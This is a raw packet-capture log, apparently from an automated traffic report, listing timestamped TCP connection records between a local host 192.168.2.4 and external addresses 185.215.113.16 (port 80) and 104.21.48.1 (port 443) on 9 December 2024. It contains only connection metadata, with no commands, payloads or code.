                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.678266048 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.678266048 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.678284883 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.678299904 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.678580999 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.678600073 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.678610086 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.678617001 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.678627014 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.678659916 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.797410965 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.797422886 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.797466040 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.797485113 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.870130062 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.870225906 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.870537043 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.870583057 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.872596979 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.872647047 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.872668982 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.872715950 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.881220102 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.881253958 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.881414890 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.889348030 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.889405966 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.889523983 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.889566898 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.897717953 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.897773027 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.897818089 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.897867918 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.906094074 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.906183958 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.906208038 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.906250000 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.914458990 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.914511919 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.914563894 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.914609909 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.922866106 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.922918081 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.923069000 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.923115969 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.931276083 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.931344032 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.931420088 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.931461096 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.939662933 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.939716101 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.939733982 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.939802885 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.947217941 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.947289944 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.947326899 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.947369099 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.989542007 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:18.989600897 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.062464952 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.062578917 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.062643051 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.064949036 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.065850019 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.065905094 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.065998077 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.066045046 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.070832968 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.070951939 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.071016073 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.075819969 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.075926065 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.075962067 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.075995922 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.080806971 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.080943108 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.080991030 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.085652113 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.085762978 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.085808992 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.090334892 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.090538979 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.090589046 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.095132113 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.095186949 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.095257044 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.099924088 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.100217104 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.100267887 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.104660988 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.104720116 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.104765892 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.109380960 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.109493971 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.109540939 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.114228010 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.114356041 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.114403009 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.118971109 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.119133949 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.119183064 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.122060061 CET44349790104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.122454882 CET44349790104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.122488976 CET44349790104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.122499943 CET49790443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.122508049 CET44349790104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.122570992 CET44349790104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.122596979 CET44349790104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.122607946 CET49790443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.122612000 CET44349790104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.122631073 CET49790443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.122803926 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.122849941 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.122879028 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.122931004 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.126566887 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.126609087 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.126677990 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.126722097 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.130340099 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.130387068 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.130453110 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.130500078 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.133486986 CET44349790104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.133548021 CET49790443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.133553982 CET44349790104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.134145021 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.134186983 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.141866922 CET44349790104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.141935110 CET49790443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.141942024 CET44349790104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.182868004 CET49790443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.241403103 CET44349790104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.254369020 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.254441977 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.254477978 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.254517078 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.255306959 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.255354881 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.255470991 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.255517960 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.258291960 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.258337021 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.258388042 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.261220932 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.261288881 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.261337042 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.264244080 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.264348984 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.264379025 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.264416933 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.267210007 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.267256975 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.267316103 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.267946959 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.270162106 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.270210981 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.270317078 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.270360947 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.273185015 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.273267031 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.273297071 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.273427010 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.276153088 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.276201963 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.276227951 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.276263952 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.279156923 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.279203892 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.279279947 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.279330969 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.282094002 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.282185078 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.282215118 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.282470942 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.285058975 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.285149097 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.285176992 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.285218000 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.288081884 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.288199902 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.288218975 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.288240910 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.291029930 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.291079998 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.291131973 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.291290045 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.292237997 CET49790443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.292246103 CET44349790104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.293988943 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.294063091 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.294074059 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.294117928 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.296952009 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.297063112 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.297153950 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.297200918 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.299940109 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.299982071 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.300105095 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.300261021 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.302886963 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.302963018 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.303005934 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.303018093 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.305876017 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.305919886 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.305953979 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.306001902 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.308856010 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.308906078 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.308965921 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.309039116 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.311858892 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.311913013 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.312022924 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.312074900 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.314811945 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.314905882 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.314950943 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.314970016 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.317893028 CET44349790104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.317919970 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.317928076 CET44349790104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.318016052 CET49790443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.318027020 CET44349790104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.318027973 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.318059921 CET44349790104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.318069935 CET49790443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.318100929 CET49790443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.318231106 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.318272114 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.320739031 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.320779085 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.320816994 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.320995092 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.323925018 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.323993921 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.324018002 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.325412989 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.326703072 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.326796055 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.326817036 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.326863050 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.327090025 CET49790443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.327105045 CET44349790104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.329688072 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.329757929 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.329793930 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.329886913 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.332734108 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.332794905 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.332809925 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.332838058 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.336086988 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.336138010 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.336412907 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.336466074 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.338625908 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.338701010 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.338825941 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.338876963 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.341594934 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.341659069 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.341734886 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.341774940 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.344577074 CET8049791185.215.113.16192.168.2.4
